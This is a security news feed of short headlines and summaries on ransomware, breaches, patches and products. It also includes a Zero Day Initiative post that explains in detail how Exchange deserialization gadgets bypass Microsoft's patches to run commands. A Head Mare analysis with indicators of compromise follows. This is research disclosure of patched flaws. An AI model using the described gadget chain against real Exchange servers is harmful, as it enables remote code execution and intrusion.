Human firewalls are essential to keeping SaaS environments safeBusinesses run on SaaS solutions: nearly every business function relies on multiple cloud-based tech platforms and collaborative work tools like Slack, Google Workspace apps, Jira, Zendesk and others. We recently surveyed security leaders and CISOs on top data security priorities and challenges. We discovered that over 70% work in organizations using 50 or more SaaS solutions, and nearly a third of the respondents reported their organization’s SaaS environments include 200 or more apps. With so … More → The post Human firewalls are essential to keeping SaaS environments safe appeared first on Help Net Security.
by Help Net Security
2024-09-06 04:30:34
Respotter: Open-source Responder honeypotRespotter is an open-source honeypot designed to detect attackers when they launch Responder within your environment. This application identifies active instances of Responder by exploiting its behavior when responding to any DNS query. Respotter leverages LLMNR, mDNS, and NBNS protocols to query a non-existent hostname (default: Loremipsumdolorsitamet). If any of these requests receive a response, Responder is likely operating on your network. Respotter can send webhooks to Slack, Teams, or Discord. It also supports sending … More → The post Respotter: Open-source Responder honeypot appeared first on Help Net Security.
by Help Net Security
2024-09-06 04:00:44
The true cost of cybercrime for your businessAs cybercriminals continue to refine their methods, blending traditional strategies with new technologies, the financial toll on individuals and organizations has reached alarming levels. Businesses are also grappling with mounting cybercrime costs from ransomware and DDoS attacks, which can inflict hundreds of thousands of dollars in damage within minutes. These statistics highlight a growing concern: as cybercrime costs rise and threats become more complex and widespread, they impact organizations of all sizes. Old methods, new … More → The post The true cost of cybercrime for your business appeared first on Help Net Security.
by Help Net Security
2024-09-06 03:30:38
83% of organizations experienced at least one ransomware attack in the last yearRansomware is an all-too-common occurrence: 83% of organizations have experienced at least one ransomware attack in the last year, 46% of respondents experienced four or more and 14% indicated they experienced 10 or more. Of those respondents who experienced at least one ransomware attack in the last year, 61% said it resulted in downtime of at least 24 hours, according to Onapsis. Source: Onapsis Of those organizations that experienced ransomware attacks, 89% said their Enterprise … More → The post 83% of organizations experienced at least one ransomware attack in the last year appeared first on Help Net Security.
by Help Net Security
2024-09-06 03:00:57
New infosec products of the week: September 6, 2024Here’s a look at the most interesting products from the past week, featuring releases from Binarly, Bitdefender, Prompt Security, Revenera, Skyhigh Security, and Vanta. Bitdefender Security for Creators protects YouTube content creators and influencers from hackers Bitdefender Security for Creators safeguards content channels and social media accounts from takeovers and supports Windows, Mac, Android, and iOS. Set-up takes a few moments and connects to both content channel and owner. Once activated, Bitdefender continuously monitors for … More → The post New infosec products of the week: September 6, 2024 appeared first on Help Net Security.
by Help Net Security
2024-09-06 00:00:00
Elastic releases the Detection Engineering Behavior Maturity ModelUsing this maturity model, security teams can make structured, measurable, and iteritive improvements to their detection engineering teams..
by Elastic Security Lab
2024-09-05 23:21:52
RansomHub Claims Planned Parenthood Hack, Steals 93GB of Sensitive DataRansomHub claims to have breached Intermountain Planned Parenthood, stealing 93GB of data. The healthcare provider is investigating the…
by Hackread
2024-09-05 23:11:27
What Is the Shared Fate Model?New threats, an overburdened workforce, and regulatory pressures mean cloud service providers need a more resilient model than the shared responsibility framework. That''s where "shared fate" comes in.
by Dark Reading
2024-09-05 21:49:00
Chinese-Speaking Hacker Group Targets Human Rights Studies in Middle EastUnnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023. ""Sighting this group''s [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them,"" Kaspersky
by The Hacker News
2024-09-05 21:35:00
Veeam Releases Security Updates to Fix 18 Flaws, Including 5 Critical IssuesVeeam has shipped security updates to address a total of 18 security flaws impacting its software products, including five critical vulnerabilities that could result in remote code execution. The list of shortcomings is below - CVE-2024-40711 (CVSS score: 9.8) - A vulnerability in Veeam Backup & Replication that allows unauthenticated remote code execution. CVE-2024-42024 (CVSS score: 9.1
by The Hacker News
2024-09-05 21:15:28
Kiteworks Bolsters Its Secure Data Collection Capabilities With 123FormBuilder Acquisition
by Dark Reading
2024-09-05 21:09:38
Palo Alto Networks® Closes Acquisition of IBM's QRadar SaaS Assets
by Dark Reading
2024-09-05 21:01:38
YubiKeys Are a Security Gold Standard—but They Can Be ClonedSecurity researchers have discovered a cryptographic flaw that leaves the YubiKey 5 vulnerable to attack.
by WIRED Security News
2024-09-05 20:56:45
Malvertising Campaign Builds a Phish for Lowe's EmployeesRetail employees are being duped into divulging their credentials by typosquatting malvertisements.
by Dark Reading
2024-09-05 20:39:26
Chinese 'Tropic Trooper'' APT Targets Mideast GovernmentsIn the past, the group has targeted different sectors in East and Southeast Asia, but recently has pivoted its focus to the Middle East, specifically to entities that publish human rights studies.
by Dark Reading
2024-09-05 20:35:15
How AI can help fix this global healthcare challengeSingapore''s health minister discusses aging populations and how AI can prepare nations for the inevitable.
by ZDNET Security
2024-09-05 20:15:02
China's ''Earth Lusca'' Propagates Multiplatform BackdoorThe malware, KTLVdoor, has already been found on more than 50 command-and-control servers and enables full control of any environment it compromises.
by Dark Reading
2024-09-05 19:57:35
Veeam fixed a critical flaw in Veeam Backup & Replication softwareVeeam addressed 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. Veeam security updates to address multiple vulnerabilities impacting its products, the company fixed 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. The most severe flaw included in the September 2024 security bulletin is a critical, […]
by Security Affairs
2024-09-05 19:39:53
Biden Admin Files Charges Against Election Meddlers From RussiaWorking with the Treasury and Justice departments, the president has sanctioned anti-democratic Russian adversaries.
by Dark Reading
2024-09-05 19:34:18
KnowBe4 Children’s Interactive Cybersecurity Activity KitThe post KnowBe4 Children’s Interactive Cybersecurity Activity Kit appeared first on National Cybersecurity Alliance.
by National Cybersecurity Alliance
2024-09-05 18:56:51
US charges five Russian military hackers with targeting Ukraine’s government with destructive malwareThe U.S. government indictment demonstrated deep knowledge of the Russian spies'' activities, including their real-world meetings at a cafe in Moscow. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-05 18:41:02
Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and EspionageA secretive Russian military unit, previously linked to assassinations and destabilization in Europe, is blamed for destructive wiper malware attacks in Ukraine. The post Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage appeared first on SecurityWeek.
by SecurityWeek
2024-09-05 18:18:49
Ransomware Gang Claims Cyberattack on Planned ParenthoodPlanned Parenthood confirms ""cybersecurity incident"" as RansomHub ransomware gang threatens to leak 93 Gb of data stolen from the nonprofit last week. The post Ransomware Gang Claims Cyberattack on Planned Parenthood appeared first on SecurityWeek.
by SecurityWeek
2024-09-05 18:00:02
The best and worst ways to get users to improve their account securityIn my opinion, mandatory enrollment is best enrollment.
by Cisco Talos Blog
2024-09-05 17:34:00
U.S. Seizes 32 Pro-Russian Propaganda Domains in Major Disinformation CrackdownThe U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions. Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA),
by The Hacker News
2024-09-05 17:33:32
Apache fixes critical OFBiz remote code execution vulnerabilityApache has fixed a critical security vulnerability in its open-source OFBiz (Open For Business) software, which could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers. [...]
by BleepingComputer
2024-09-05 17:28:25
Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub RansomwareAttackIQ has released a new assessment template in response to the CISA Advisory (AA24-207A) published on August 29, 2024, that disseminates known RansomHub ransomware IOCs and TTPs that have been identified through FBI threat response activities and third-party reporting as recently as August 2024. The post Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware appeared first on AttackIQ.
by AttackIQ
2024-09-05 17:19:06
Preventing Infections of N-Day Exploits Delivered via Malicious WebsitesState-backed attackers and commercial surveillance vendors repeatedly using N-day exploits to target known vulnerabilities in devices. The post Preventing Infections of N-Day Exploits Delivered via Malicious Websites appeared first on Zimperium.
by Zimperium
2024-09-05 17:05:08
Five Keys To Amplifying Business ValueBusinesses can amplify their digital transformation to enhance value through five key elements: business agility, transparency and validation of outcomes, ease of inclusion, augmented analysis, and AI.
by ITPro Today
2024-09-05 17:00:35
Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare TeamUnit 29155 of Russia’s GRU military intelligence agency—a team responsible for coup attempts, assassinations, and bombings—has branched out into brazen hacking operations with targets across the world.
by WIRED Security News
2024-09-05 16:56:22
Microsoft removes revenge porn from Bing search using new toolMicrosoft announced today that it has partnered with StopNCII to proactively remove harmful intimate images and videos from Bing using digital hashes people create from their sensitive media. [...]
by BleepingComputer
2024-09-05 16:55:05
WordPress Mandates 2FA, SVN Passwords for Plugin, Theme AuthorsStarting October 2024, WordPress requires plugin and theme authors to enable two-factor authentication (2FA) and use SVN-specific passwords…
by Hackread
2024-09-05 16:26:52
Watch our new documentary, "The Light We Keep: A Project PowerUp Story""The Light We Keep documentary tells the story of the consequences of electronic warfare in Ukraine and its effect on power grids across the country.
by Cisco Talos Blog
2024-09-05 16:09:41
Keeper Security Named a Value Leader in EMA’s 2024 PAM Radar™ ReportPasswords and secrets management organisation Keeper Security has earned the distinction of Value Leader in the latest Enterprise Management Associates (EMA) 2024 Privileged Access Management (PAM) Radar™ Report for the second year in a row. The report highlights KeeperPAM – the company’s unified, end-to-end encrypted, zero-trust PAM platform – for its exceptional performance in managing […] The post Keeper Security Named a Value Leader in EMA’s 2024 PAM Radar™ Report appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 16:03:59
The GRC Group Strengthens Cybersecurity Offering with Acquisition of Pentest People, Expanding Its Global Reach and ExpertiseThe GRC Group (“GRC” or the “Group“), a leading provider of software and tech-enabled services to manage business risks and regulatory compliance, has today acquired Pentest People Ltd (“Pentest People”). The GRC Group is focused on building market-leading positions in select areas of the governance, risk and compliance market, and the acquisition of Pentest People […] The post The GRC Group Strengthens Cybersecurity Offering with Acquisition of Pentest People, Expanding Its Global Reach and Expertise appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 15:52:47
How to prepare for ransomware attacksYou only have to take a look at the latest headlines to see that ransomware is still having a significant impact on organizations of all sizes across a wide variety of industries. The threat is evolving, though.
by Barracuda
2024-09-05 15:41:52
Why It's So Hard to Fully Block X in BrazilWith 20,000 internet providers across the country, the technical challenges of blocking X in Brazil mean some connections are slipping through the cracks.
by WIRED Security News
2024-09-05 15:39:37
Exploiting Exchange PowerShell After ProxyNotShell: Part 1 - MultiValuedPropertyAs you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of four blog posts is meant to supplement the talk and provide additional technical details. For those who did not attend OffensiveCon, you can also watch the full talk here: “Half Measures and Full Compromise: Exploiting Microsoft Exchange PowerShell Remoting”. This blog post covers the part from 12:05 to 18:10. In this article, part one of the series, I describe the MultiValuedProperty exploitation primitive, which became fundamental for my further exploitation of Exchange PowerShell. I also present a bypass for Microsoft’s first patch for this vulnerability, accomplished by chaining MultiValuedProperty with the Command class. Introduction You might already be familiar with the Exchange ProxyNotShell chain, CVE-2022-41040 and CVE-2022-41082. It allowed any authenticated Exchange user to achieve remote code execution. ProxyNotShell was exploited in the wild before Microsoft released a patch. I described the ProxyNotShell chain, especially its RCE vector, in this blog post. Before proceeding with this post, please make sure that you are familiar with the original issue, as this article will focus on bypassing the patches. In this blog post, I would like to start with 2 RCE vulnerabilities: • ZDI-23-163/ CVE-2023-21529 – abuse of the allowed MultiValuedProperty class.• ZDI-23-881/ CVE-2023-32031 – bypass for CVE-2023-21529, abuse of not blocked Command class. Accessing PowerShell Without ProxyShell Path Confusion The original path confusion vulnerability, CVE-2021-34473, was discovered by Orange Tsai. He used it together with CVE-2021-34523 and CVE-2021-31207 to achieve pre-auth remote code execution, forming the chain known as ProxyShell. Microsoft’s original patch for the path confusion did not eliminate the root of the problem, but instead placed it behind authentication. After the patch, it was exploited in the wild for post-auth remote code execution using the ProxyNotShell chain mentioned above. Exploitation of the path confusion allowed a threat actor to reach the Exchange PowerShell backend by sending HTTP requests to the autodiscover endpoint. After the patch for ProxyNotShell, it appears that this attack vector is completely blocked, though I must admit that I have never fully verified that patch. Nonetheless, a low-privileged attacker still has direct access to Exchange PowerShell Remoting, subject to Kerberos authentication. This is because every Exchange user can trigger some Exchange PowerShell cmdlets, such as Get-Mailbox. Instructions that describe direct interaction with the Exchange PowerShell can be found here. As Kerberos authentication is required, this attack surface is probably restricted to internal attackers, which is to say, attackers who are already present in the organization’s network. There remains plenty of reason for concern, though. It would not be good if any domain account (and organization member) could escalate to SYSTEM on the Exchange server. Patch for the ProxyNotShell CVE-2022-41082 RCE CVE-2022-41082, the RCE part of the ProxyNotShell chain, was fixed with the introduction of the Microsoft.Exchange.Diagnostics.UnitySerializationHolderSurrogateSelector class. It extends SurrogateSelector and its main goal is to validate the types that are retrieved during the deserialization of UnitySerializationHolder. It does this by checking the types against an allow list. Microsoft’s approach here seems appropriate. An allow list is probably the best way to fight deserialization issues and similar type-based vulnerabilities. However, when the allow list is extensive, it may be possible to find some types there that can be used in exploitation. I decided to take this path and look for potentially dangerous allowed classes. ZDI-23-162/ CVE-2023-21529 – Allowed MultiValuedProperty Leads to RCE The Exchange allow lists can be divided into two main parts:• List of allowed regular types.• List of allowed generic types. Generic types seem especially interesting because they allow the inclusion of arbitrary, internal types. Moreover, generic types can be also retrieved through a deserialization of UnitySerializationHolder. Let’s review the list of allowed generics that are defined in the Microsoft.Exchange.Data.SerializationTypeConverter.allowedGenerics member. The first part of the list is especially interesting because it contains custom Exchange types. It turns out that deserialization involving retrieval of the Microsoft.Exchange.Data.MultiValuedProperty<T> or Microsoft.Exchange.Data.DagNetMultiValuedProperty<T> generic classes can lead to remote code execution. One may remember that PowerShell Remoting deserialization allows one to call a single-argument constructor of any allowed type (as long as the argument can be also deserialized). This leads us to a consider a single-argument constructor of MultiValuedProperty<T>. As you can see, it accepts an argument of type object. Thus, the attacker can provide an instance of any allowed PowerShell Remoting deserializable class. This constructor invokes a different constructor that accepts a larger number of arguments. A great deal of processing occurs after the constructor call. Of primary interest is that we ultimately reach the ValueConvertor.ConvertValue method. Here, the attacker-controlled type is provided as the second argument, while the attacker-controlled object is provided as the first argument. This is the object provided to the MultiValuedProperty constructor. At [1], it invokes ValueConvertor.TryParseConversion. This call looks particularly interesting because the method name suggests that the Parse method is involved. At [2], it calls TryConstructorConversion. Let’s focus on the parse-based conversion now. At this stage, it is worth to note the values of specific arguments: • originalValue - value provided by the attacker to the MultiValuedProperty constructor.• originalType - type of the originalValue.• resultType - the type parameter (“T”) of the attacker-specified generic MultiValuedProperty<T> type. At [1], the method checks if originalType is the type string At [2], it calls ConvertValueFromString. This method is also called during the deserialization process. This method hardcodes several possible conversions and throws NotImplementedException if the conversion from originalType to resultType is not implemented. At [3], it catches the exception. At [4], it retrieves the public static Parse method from the attacker-controlled resultType. At [5], it invokes the Parse method with the attacker-specified value. To summarize, the MultiValuedProperty<T> generic class implements another way to call the Parse method. This can result in invocation of the XamlReader.Parse(String) method with an attacker-controlled string. In addition, TryConstructorConversion allows one to call a single-argument constructor of a given class. At this point, one can see that MultiValuedProperty<T> class implements the two most powerful conversions of PowerShell Remoting. Since it is an internal deserialization mechanism, it is included on the allow list. It can be abused by the attacker, for example to call a single-argument constructor of any accessible class. This became a fundamental building block for my subsequent vulnerability research. As an example of how MultiValuedProperty<T> can be abused, consider the following code: This line simulates what we achieve via Exchange PowerShell Remoting during exploitation: • The attacker provides a serialized UnitySerializationHolder object that specifies the allowed MultiValuedProperty<T> type. The type parameter, T, is set to System.Windows.Markup.XamlReader.• An allow list check is performed on our type: MultiValuedProperty<XamlReader>. The check is successful, because: (1) MultiValuedProperty<T> is present on the allow list, and (2) the type specified in the type parameter, XamlReader, is not subjected to validation at all.• The MultiValuedProperty constructor instantiates a XamlReader object by calling the static XamlReader.Parse(String) method.• As the attacker controls the input string, they can provide any XAML deserialization gadget to achieve remote code execution. The simplified attack scheme is presented in the following diagram. As we have shown, allow lists are not always secure, and they need to be carefully reviewed. It may turn out that even in a product as mature as Microsoft Exchange, allowed classes may contain functionality that can be abused. This may be especially true for generic classes included in the allow list. The generic (internal) type should always be verified by your type control mechanism. Otherwise, your allowed class may turn out to be abusable. Moreover, class inheritance should also be verified. For example, suppose that Microsoft removed MultiValuedProperty<T> from the allow list. We would still be able to reach it via the allowed type DagNetMultiValuedProperty<T>: DagNetMultiValuedProperty<T> inherits from MultiValuedProperty<T>. Its single-argument constructor calls the constructor of the base class. Thus, it is another way to trigger the dangerous routine, and it could be abused even if MultiValuedProperty<T> were removed from the allow list. ZDI-23-881/ CVE-2023-32031 – Bypassing the Internal Deny List with the Command Class In CVE-2023-21529, I abused the internal deserialization-like mechanism that can be reached through the allow-listed MultiValuedProperty<T> class. When considering potential patches, two approaches present themselves: Remove MultiValuedProperty<T> from the allow list. Implement additional type control in the internal deserialization mechanism within MultiValuedProperty. MultiValuedProperty is frequently used by the Exchange, thus removing it from an allow list is not an option. Implementing type control in the internal deserialization mechanism defined in ValueConvertor.ConvertValue looks like a good option though. This is what the patch looks like: You can see that the ChainedSerializationBinder.ValidateResultType method was introduced, to limit the types that the attacker can specify. Consequently, if the attacker provides the type MultiValuedProperty<XamlReader>, an exception is being thrown, because type XamlReader fails the new validation. Looking deeper into the validation mechanism, though, I found that type validation here is based on a deny list. Instead of implementing a allow list of types that can be used with the MultiValuedProperty, a deny list was used. If you have seen my Hexacon talk about .NET deserialization, you probably know that I love messing with deny lists. The Exchange deny list is actually pretty good, and it contains dozens of classes. However, it contains almost no internal Exchange classes. My idea was to look for a class, that: • Is not on the deny list.• Implements a public and static Parse(String) method that leads to something exploitable, or• Implements a public constructor that accepts a single argument and leads to something exploitable. Such a class could be abused when chained with MultiValuedProperty internal deserialization. The constructor-based deserialization is handled by the previously mentioned TryConstructorConversion method, and it is pretty much the same as the one implemented in PowerShell Remoting. It didn’t take me long to find the Microsoft.Diagnostics.Runtime.Utilities.Command class: At [1], the Command(String) constructor calls the Command(String, CommandOptions) constructor. At [2], a new ProcessStartInfo is instantiated, and both the process name and arguments are retrieved from the attacker''s controlled input. At [3], Process.StartInfo is set to the ProcessStartInfo object from line [2]. At [4], a new process is started. This class was not included in the deny list, so the following code: Leads to the execution of cmd.exe /c calc.exe. That’s it. To sum this up, I did the following: • I used the allow-listed MultiValuedProperty class to reach the internal deserialization mechanism. This mechanism is protected with the deny list of abusable types.• I delivered the Command class, which is not on the deny list. This allows execution of an arbitrary command. Demo I presented the demo for CVE-2023-32031 during my Hexacon 2023 talk about .NET deserialization. It shows the entire exploitation process with the debugger attached. SummaryIn this blog post, I have described both CVE-2023-21529 and CVE-2023-32031. In those vulnerabilities, I abused both the allow-listed and deny-listed classes to achieve RCE on Exchange. That wasn’t the end of my Exchange vulnerability research, though. I still had two additional full-RCE chains that I was able to deliver after the CVE-2023-32031 patch.In the next blog post, I will provide you with full details on the ZDI-23-1419/CVE-2023-36756 RCE vulnerability. Once again, you can watch my entire OffensiveCon 2024 talk here. Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2024-09-05 15:37:49
Lowe’s employees phished via Google adsCriminals are impersonating MyLowesLife, Lowes'' HR portal for current and former employees.
by Malwarebytes Labs
2024-09-05 15:32:41
RansomHub Leads, Lockbit Declines in Global Ransomware AttacksIndustrials, consumer cyclicals, and healthcare sectors remain primary targets, with North America bearing the brunt of attacks.
by ITPro Today
2024-09-05 15:31:50
Planned Parenthood partly offline after ransomware attackIntermountain Planned Parenthood of Montana suffered a cyberattack which has been claimed by a ransomware group
by Malwarebytes Labs
2024-09-05 15:22:13
Manufacturing Sector Is the Latest Target of Advanced Credential Harvesting AttacksA new attack runs slow and steady, focused on compromising large manufacturing companies using contextual social engineering to trick victims into giving up credentials.
by KnowBe4
2024-09-05 15:21:58
Phishing is Still the Top Initial Access VectorPhishing remains a top initial access vector for threat actors, according to researchers at ReliaQuest. Phishing and other social engineering tactics can bypass security technologies by targeting humans directly.
by KnowBe4
2024-09-05 15:10:39
How to Put Yourself Out There – Networking on Social MediaIt is no surprise that growing your social network can help get your name out there and provide opportunities to advance your career. LinkedIn, one of the original career-focused networking […] The post How to Put Yourself Out There – Networking on Social Media appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-09-05 15:08:30
How to Get a Job in Cybersecurityby Gerald Auger of Simply Cyber // Guest Author You want to break into cybersecurity? That’s AWESOME. I’ve been in the field for 20 years and I LOVE IT! But […] The post How to Get a Job in Cybersecurity appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-09-05 15:08:22
Microchip Confirms Data Breach as Play Ransomware Leaks Stolen DocsMicrochip Technology Inc., a leading semiconductor manufacturer, disclosed a data breach following a cyberattack that compromised its IT infrastructure. The attack, claimed by the Play ransomware group, forced the company to partially shut down operations while it worked to restore critical systems. In an SEC filing dated September 4, 2024, the company reported that the … The post Microchip Confirms Data Breach as Play Ransomware Leaks Stolen Docs appeared first on CyberInsider.
by Cyber Insider
2024-09-05 14:55:29
UK Public Worried About Global Over Reliance on IT SystemsA new survey examining public sentiment towards global IT and software providers in the aftermath of the July 2024 CrowdStrike IT outages reveals over three-quarters of people in the UK now worry about the heavy reliance of global organisations on IT systems and software providers. The research was conducted by OnePoll, on behalf of International […] The post UK Public Worried About Global Over Reliance on IT Systems appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 14:49:00
NIST Cybersecurity Framework (CSF) and CTEM – Better TogetherIt’s been a decade since the National Institute of Standards and Technology (NIST) introduced its Cybersecurity Framework (CSF) 1.0. Created following a 2013 Executive Order, NIST was tasked with designing a voluntary cybersecurity framework that would help organizations manage cyber risk, providing guidance based on established standards and best practices. While this version was originally
by The Hacker News
2024-09-05 14:38:20
10 Critical PCI DSS Compliance Pitfalls Retailers Must NavigateIn today’s digital retail landscape, PCI DSS compliance is not just a regulatory requirement—it’s a critical business imperative. As a seasoned QSA and security consultant with over two and half decades of experience, I’ve witnessed firsthand the devastating impact of data breaches on businesses. Did you know that 60% of small businesses close within six...
by RH-ISAC
2024-09-05 14:33:05
The Rise of Head Mare: A Geopolitical and Cybersecurity AnalysisKey takeaways The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine. Head Mare''s attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives. The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk. Head Mare’s cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine''s military actions. The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems. Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient. Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks. Overview The Head Mare hacktivist group has emerged as a formidable digital adversary in today’s geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group’s actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict. Head Mare''s focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions. The group''s operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus. The Geopolitical Angle of Head Mare’s Activities The geopolitical implications of Head Mare’s activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group''s attacks are likely intended to support Ukraine''s strategic objectives by applying additional pressure on Russia and Belarus. The Russian military''s struggles, especially following Ukraine’s recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare''s attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus. The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus''s army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus’s preparations for Independence Day celebrations. Despite the official narrative, Lukashenka’s actions are likely influenced by Moscow’s broader strategy. The Belarusian leader’s military deployment aligns with Putin’s attempt to create a strategic diversion. However, Belarus''s involvement in the conflict remains complex. Lukashenka’s regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka''s precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely. Technical Sophistication and Strategic Intent Head Mare''s cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection. Persistence techniques are another hallmark of Head Mare’s operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group’s operational longevity but also contribute to the ongoing disruption. Detection evasion is a critical component of Head Mare’s strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems. Command and Control Infrastructure and Credential Theft Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle. Credential theft is another crucial aspect of Head Mare’s strategy. Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro3 facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate their access and maintain control over targeted networks, amplifying their disruptive impact. Head Mare’s use of ransomware, including LockBit and Babuk, highlights their intent to cause maximum disruption. LockBit targets Windows systems, while Babuk is designed for ESXi servers. The encryption of files and the demand for ransoms serve both financial and operational purposes. By employing multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with their demands. Conclusion Head Mare’s cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption. Head Mare’s operations are a reflection of the broader geopolitical dynamics at play, with their cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security. Recommendations and Mitigation To counteract the threats posed by Head Mare and similar actors, organizations should implement the following best practices: Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation. Maintain encrypted backups in isolated locations to safeguard against ransomware attacks. Use EDR solutions to detect and respond to malicious activities in real time. Educate employees on recognizing and avoiding phishing attempts and other cyber threats. Keep systems and software up to date with the latest security patches to reduce vulnerabilities. Indicators of Compromise (IOCs) Indicator Type of Indicator Comments 201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8 SHA-256 NA 9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69 SHA-256 NA 08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470 SHA-256 NA 6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263 SHA-256 NA 33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A SHA-256 NA 5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03 SHA-256 NA 9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0 SHA-256 NA 5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9 SHA-256 NA DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA SHA-256 NA 053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD SHA-256 NA 2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921 SHA-256 NA 015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343 SHA-256 NA 9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546 SHA-256 NA 22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3 SHA-256 NA 2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569 SHA-256 NA AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F SHA-256 NA 9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836 SHA-256 NA B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984 SHA-256 NA 92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50 SHA-256 NA 664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38 SHA-256 NA 311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86 SHA-256 NA 4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271 SHA-256 NA 2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50 